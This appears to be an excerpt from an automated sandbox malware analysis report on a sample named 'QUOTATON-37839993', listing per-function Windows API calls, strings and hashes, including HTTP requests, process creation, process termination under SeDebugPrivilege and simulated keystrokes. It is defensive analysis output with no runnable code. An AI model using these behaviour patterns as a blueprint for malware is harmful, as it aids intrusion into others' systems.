                                                                      • API ID: Variant$ClearInit$_memset
                                                                      • String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2862541840-218231672
                                                                      APIs
                                                                      • EnumChildWindows.USER32(?,00E5A439), ref: 00E5A377
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ChildEnumWindows
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 3555792229-1603158881
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E02EAE
                                                                        • Part of subcall function 00E01DB3: GetClientRect.USER32(?,?), ref: 00E01DDC
                                                                        • Part of subcall function 00E01DB3: GetWindowRect.USER32(?,?), ref: 00E01E1D
                                                                        • Part of subcall function 00E01DB3: ScreenToClient.USER32(?,?), ref: 00E01E45
                                                                      • GetDC.USER32 ref: 00E3CD32
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E3CD45
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E3CD53
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E3CD68
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00E3CD70
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E3CDFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E71A50
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E71A7C
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E71ABE
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E71AD3
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71AE0
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E71B10
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00E71B57
                                                                        • Part of subcall function 00E72483: GetLastError.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E72498
                                                                        • Part of subcall function 00E72483: SetEvent.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E724AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 2603140658-3916222277
                                                                      • Opcode ID: 7c1f25bfff8ac1018f9e6f234db43efbe018bd579ef152aa76074a9d569561bb
                                                                      • Instruction ID: d0225402a176f8412f5a2e390e78047dfc83881e71e865a81f0af82dfcff8b5a
                                                                      • Opcode Fuzzy Hash: 7c1f25bfff8ac1018f9e6f234db43efbe018bd579ef152aa76074a9d569561bb
                                                                      • Instruction Fuzzy Hash: BC417FB1511318BFEB118F54CC89FFA7BACEF08354F00916AFA09BA141E7759E449BA0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E8F910), ref: 00E78D28
                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E8F910), ref: 00E78D5C
                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E78ED6
                                                                      • SysFreeString.OLEAUT32(?), ref: 00E78F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                      • String ID:
                                                                      • API String ID: 560350794-0
                                                                      • Opcode ID: 18591369a9e9c98b9c25bcefea7b20bd781d54161a8b708422d4f24633733920
                                                                      • Instruction ID: fa03a5fd32608d09d996e38965d99d5625f8d417d444f3ef01652820f38710a3
                                                                      • Opcode Fuzzy Hash: 18591369a9e9c98b9c25bcefea7b20bd781d54161a8b708422d4f24633733920
                                                                      • Instruction Fuzzy Hash: 67F12571A00209AFCF14DF94C988EAEB7B9FF59314F109498F909BB251DB31AE45CB61
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E7F6B5
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F848
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F86C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F8AC
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E7F8CE
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E7FA4A
                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00E7FA7C
                                                                      • CloseHandle.KERNEL32(?), ref: 00E7FAAB
                                                                      • CloseHandle.KERNEL32(?), ref: 00E7FB22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                      • String ID:
                                                                      • API String ID: 4090791747-0
                                                                      • Opcode ID: 98b3f2c849adda3316938117d85ac1b6a1432d33c7d55435e6357b191b3f9f7a
                                                                      • Instruction ID: 3b6acb9b86a834702d06f6912f55a12ef2e231f4063a949fe3b6cd6173379db4
                                                                      • Opcode Fuzzy Hash: 98b3f2c849adda3316938117d85ac1b6a1432d33c7d55435e6357b191b3f9f7a
                                                                      • Instruction Fuzzy Hash: 95E1AF716043009FCB14EF24D891B6ABBE1BF85354F14D96DF899AB2A2DB30DC85CB52
                                                                      APIs
                                                                        • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63697,?), ref: 00E6468B
                                                                        • Part of subcall function 00E6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63697,?), ref: 00E646A4
                                                                        • Part of subcall function 00E64A31: GetFileAttributesW.KERNEL32(?,00E6370B), ref: 00E64A32
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E64D40
                                                                      • _wcscmp.LIBCMT ref: 00E64D5A
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00E64D75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 793581249-0
                                                                      • Opcode ID: e4c5ceceb3d854b9d96157f94ceeebcd1a7d0af85a6e758dd8a7c462dea82e61
                                                                      • Instruction ID: 5c042b3b578e5511e0bec7feca7b4e7952870a69965cfabad7412aff6fa1a600
                                                                      • Opcode Fuzzy Hash: e4c5ceceb3d854b9d96157f94ceeebcd1a7d0af85a6e758dd8a7c462dea82e61
                                                                      • Instruction Fuzzy Hash: 6A5166B25483459BC725EBA0E8819DF73ECAF85354F00192EF289E3191EF35A588C766
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E886FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: b089b370f18ac6477e7d6ad6f8aa9a25d8ec1d908955afcd73e399c8966e0519
                                                                      • Instruction ID: 7489cc57187955f9a2f919154e6445152e1294aaa37149578a427a261f52ef5a
                                                                      • Opcode Fuzzy Hash: b089b370f18ac6477e7d6ad6f8aa9a25d8ec1d908955afcd73e399c8966e0519
                                                                      • Instruction Fuzzy Hash: 7651A470500244BFEB24AB25CE89F997BA4AB05324FE02126FD5DF61E0DF72A980DB40
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E3C2F7
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3C319
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E3C331
                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E3C34F
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E3C370
                                                                      • DestroyIcon.USER32(00000000), ref: 00E3C37F
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E3C39C
                                                                      • DestroyIcon.USER32(?), ref: 00E3C3AB
                                                                        • Part of subcall function 00E8A4AF: DeleteObject.GDI32(00000000), ref: 00E8A4E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                      • String ID:
                                                                      • API String ID: 2819616528-0
                                                                      • Opcode ID: fd015a9329a28d7c373dac0f12489039fd370a213c6227aa71531cdb756e48e8
                                                                      • Instruction ID: 903ef2d9e0df0bd2f365dfe6b6dcd6f2b0ebe73950f395a1596d8614d98968a4
                                                                      • Opcode Fuzzy Hash: fd015a9329a28d7c373dac0f12489039fd370a213c6227aa71531cdb756e48e8
                                                                      • Instruction Fuzzy Hash: 8A516971600205AFDB24DF65CC49FAA7BE5EB58314F205529FA06B72E0D771EC90DB50
                                                                      APIs
                                                                        • Part of subcall function 00E5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5A84C
                                                                        • Part of subcall function 00E5A82C: GetCurrentThreadId.KERNEL32 ref: 00E5A853
                                                                        • Part of subcall function 00E5A82C: AttachThreadInput.USER32(00000000,?,00E59683,?,00000001), ref: 00E5A85A
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5968E
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E596AB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E596AE
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E596B7
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E596D5
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E596D8
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E596E1
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E596F8
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E596FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 5635755b1de73c8a897df2ac3abbb48eb556af2252eec3134f7b8bcb8e2d99f1
                                                                      • Instruction ID: c5f02bc006f01e968c92be300f1841f7584aafa9150be3eff1a5308871253dea
                                                                      • Opcode Fuzzy Hash: 5635755b1de73c8a897df2ac3abbb48eb556af2252eec3134f7b8bcb8e2d99f1
                                                                      • Instruction Fuzzy Hash: 2011CEB1A10218BEF6106B619C8DFAA3B6DEB4C751F101525F648BB0A1C9F25C149BA4
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E5853C,00000B00,?,?), ref: 00E5892A
                                                                      • HeapAlloc.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E58931
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E5853C,00000B00,?,?), ref: 00E58946
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E5853C,00000B00,?,?), ref: 00E5894E
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E58951
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E5853C,00000B00,?,?), ref: 00E58961
                                                                      • GetCurrentProcess.KERNEL32(00E5853C,00000000,?,00E5853C,00000B00,?,?), ref: 00E58969
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00E5853C,00000B00,?,?), ref: 00E5896C
                                                                      • CreateThread.KERNEL32(00000000,00000000,00E58992,00000000,00000000,00000000), ref: 00E58986
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: e99fd6595e7cfbd3f24dc8f362d73ccbfa21f52ce8e092e8a114ce4ff9ad136e
                                                                      • Instruction ID: 2b02a1f3436af1581194cfb5bf3869653c3249ed67fbc2b0e5387c9d9cc88673
                                                                      • Opcode Fuzzy Hash: e99fd6595e7cfbd3f24dc8f362d73ccbfa21f52ce8e092e8a114ce4ff9ad136e
                                                                      • Instruction Fuzzy Hash: 3801BF75641304FFE710ABA5DC8DF677B6CEB89711F404421FA09EB1A2CA74D814CB20
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 00452539a995aa0a90422d939bafd7269d2fca2b969840aa887b4ab18eeeac2d
                                                                      • Instruction ID: 86976f168d5641f4255c19dbd0db2144d9a34ea00867d5f4c30800e8a5027c22
                                                                      • Opcode Fuzzy Hash: 00452539a995aa0a90422d939bafd7269d2fca2b969840aa887b4ab18eeeac2d
                                                                      • Instruction Fuzzy Hash: 37C19371A0021A9FDF10DF98D884AEEB7F5FF48314F149469E909BB282E770AD45CB90
                                                                      APIs
                                                                        • Part of subcall function 00E5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?,?,00E57455), ref: 00E57127
                                                                        • Part of subcall function 00E5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57142
                                                                        • Part of subcall function 00E5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57150
                                                                        • Part of subcall function 00E5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?), ref: 00E57160
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E79806
                                                                      • _memset.LIBCMT ref: 00E79813
                                                                      • _memset.LIBCMT ref: 00E79956
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E79982
                                                                      • CoTaskMemFree.OLE32(?), ref: 00E7998D
                                                                      Strings
                                                                      • NULL Pointer assignment, xrefs: 00E799DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 1300414916-2785691316
                                                                      • Opcode ID: cd0906fcad3534c2ee71c4b992849ec43b8adb3aa0c2ebb02e47cb85477b3cf7
                                                                      • Instruction ID: 246cd723b006f71872ba3e743423912e0aed1ff5d1016d04d20338adfb7b7e4f
                                                                      • Opcode Fuzzy Hash: cd0906fcad3534c2ee71c4b992849ec43b8adb3aa0c2ebb02e47cb85477b3cf7
                                                                      • Instruction Fuzzy Hash: 8B912871D00229EBDB10DFA5DC41EDEBBB9AF48310F10916AF519B7291EB719A44CFA0
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E86E24
                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E86E38
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E86E52
                                                                      • _wcscat.LIBCMT ref: 00E86EAD
                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E86EC4
                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E86EF2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat
                                                                      • String ID: SysListView32
                                                                      • API String ID: 307300125-78025650
                                                                      • Opcode ID: 96cf89c14e0f483dbd72b326e99d8be8a64fd262b13895556a211325b3119c7b
                                                                      • Instruction ID: 3b80253fdca9d53bf3c5415756a5fe7761ef2908750dd0bc53e8e8ef3771dcc9
                                                                      • Opcode Fuzzy Hash: 96cf89c14e0f483dbd72b326e99d8be8a64fd262b13895556a211325b3119c7b
                                                                      • Instruction Fuzzy Hash: 55419171A00348AFDB21AF64CC85BEEB7F8EF08354F10156AF68CB7291D6719D848B60
                                                                      APIs
                                                                        • Part of subcall function 00E63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00E63C7A
                                                                        • Part of subcall function 00E63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00E63C88
                                                                        • Part of subcall function 00E63C55: CloseHandle.KERNEL32(00000000), ref: 00E63D52
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7E9A4
                                                                      • GetLastError.KERNEL32 ref: 00E7E9B7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7E9E6
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7EA63
                                                                      • GetLastError.KERNEL32(00000000), ref: 00E7EA6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E7EAA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: cc6aaa3acce6bd3c40a4656be5d6caf6b71cd71f354fc33f04e0e2e41560e99a
                                                                      • Instruction ID: 24ec945d0725ff5e0d730cb959cac5f42815737aa5f7d9c3d34fe1138b07fae9
                                                                      • Opcode Fuzzy Hash: cc6aaa3acce6bd3c40a4656be5d6caf6b71cd71f354fc33f04e0e2e41560e99a
                                                                      • Instruction Fuzzy Hash: AE418A712002009FDB14EF64CC95B6AB7E5AF84314F049458F90AAB3D3DB70A848CB91
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E63033
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: 21cbcccc42824eab496c1a2665f49a9d81e147539ed0ab2dbd06363ccb85ffbc
                                                                      • Instruction ID: 86fde4b72344f71f0d705aeb31088e220817e9f7db8b32b83875515cee4919c8
                                                                      • Opcode Fuzzy Hash: 21cbcccc42824eab496c1a2665f49a9d81e147539ed0ab2dbd06363ccb85ffbc
                                                                      • Instruction Fuzzy Hash: 79112B31388346BEE7259A64FC42CEF779CDF253A4B20102EFA00B6282DB715F4856A4
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E64312
                                                                      • LoadStringW.USER32(00000000), ref: 00E64319
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E6432F
                                                                      • LoadStringW.USER32(00000000), ref: 00E64336
                                                                      • _wprintf.LIBCMT ref: 00E6435C
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E6437A
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E64357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
